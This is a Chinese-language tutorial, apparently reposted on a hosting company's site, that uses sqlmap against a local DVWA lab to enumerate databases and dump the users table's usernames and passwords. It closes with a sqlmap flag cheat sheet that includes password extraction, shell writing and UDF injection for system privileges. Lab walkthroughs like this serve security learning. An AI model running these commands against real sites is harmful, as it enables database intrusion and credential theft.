一 前期準備
創新互聯主營蕭縣網站建設的網絡公司,主營網站建設方案,手機APP定制開發,蕭縣h5重慶小程序開發搭建,蕭縣網站營銷推廣歡迎蕭縣等地區企業咨詢1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可
https://www.python.org/
2 安裝python2.7,默認即可。安裝完成后需要配置下環境變量。右擊計算機->高級系統設置->環境變量,找到系統變量的Path選項,雙擊,在最后添加;C:\Python27“;”必須要有,如果有其他python,可以刪掉。這是我的安裝路徑。
3 按windows+R,輸入cmd打開dos界面,輸入python進行測試python是否安裝成功。
返回python版本號,安裝成功
4 下載sqlmap,可以到我的百度云下載:http://pan.baidu.com/s/1skPClzR密碼:ndpj。
解壓后,改名為sqlmap,放到磁盤中
5 打開cmd,切換到sqlmap對應磁盤
6 至此,sqlmap安裝完畢
二 開始爆庫
1 將dvwa安全級別設置為low,采用的是cookie注入。點擊sql注入,使用burpsuite抓包拿cookie
2 url和cookie都需要使用,打開剛才開的cmd,鍵入
Sqlmap.py -u“http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie“security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1” --risk 3 --level 5 ,中途出現選擇項直接回車
3 明顯看到有mysql數據庫,先將數據庫顯示出來sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" --dbs
4 可以看到有幾個數據庫,然后選擇dvwa數據庫,列表名
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa --tables
5 出現兩個表名,肯定有用的是users表名,然后暴列名
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users --columns
6 看到了很多列名,最有用的當然是用戶和密碼了,導出用戶和密碼
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users -C user,password,user_id --dump
7 好了至此完畢,接下來是sqlmap的命令解釋大全
-u #注入點
-g 谷歌搜索
-f #指紋判別數據庫類型
-b #獲取數據庫版本信息
-p #指定可測試的參數(?page=1&id=2 -p“page,id”)
-D “”#指定數據庫名
-T “”#指定表名
-C “”#指定字段
-s “”#保存注入過程到一個文件,還可中斷,下次恢復在注入(保存:-s“xx.log” 恢復:-s“xx.log” –resume)
–columns #列出字段
–current-user #獲取當前用戶名稱
–current-db #獲取當前數據庫名稱
–users #列數據庫所有用戶
–passwords #數據庫用戶所有密碼
–privileges #查看用戶權限(–privileges -U root)
-U #指定數據庫用戶
–dbs #列出所有數據庫
–tables -D“”#列出指定數據庫中的表
–columns -T“user”-D“mysql”#列出mysql數據庫中的user表的所有字段
–dump-all #列出所有數據庫所有表
–exclude-sysdbs #只列出用戶自己新建的數據庫和表
–dump -T“”-D“”-C“”#列出指定數據庫的表的字段的數據(–dump -T users -D master -C surname)
–dump -T“”-D“” –start 2–top 4 #列出指定數據庫的表的2-4字段的數據
–dbms #指定數據庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)
–os #指定系統(Linux,Windows)
--sql -shell 寫shell
--delay 延遲的時間
--safe-freq 次數
-v #詳細的等級(0-6)
0:只顯示Python的回溯,錯誤和關鍵消息。
1:顯示信息和警告消息。
2:顯示調試消息。
3:有效載荷注入。
4:顯示HTTP請求。
5:顯示HTTP響應頭。
6:顯示HTTP響應頁面的內容
–privileges #查看權限
–is-dba #是否是數據庫管理員
–roles #枚舉數據庫用戶角色
–udf-inject #導入用戶自定義函數(獲取系統權限)
–union-check #是否支持union注入
–union-cols #union查詢表記錄
–union-test #union語句測試
–union-use #采用union注入
–union-tech orderby #union配合order by
另外有需要云服務器可以了解下創新互聯cdcxhl.cn,海內外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業上云的綜合解決方案,具有“安全穩定、簡單易用、服務可用性高、性價比高”等特點與優勢,專為企業上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。
分享標題:記一次初級dvwa爆庫-創新互聯
分享鏈接:http://vcdvsql.cn/article8/hocip.html
成都網站建設公司_創新互聯,為您提供面包屑導航、微信公眾號、小程序開發、虛擬主機、關鍵詞優化、網站導航
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯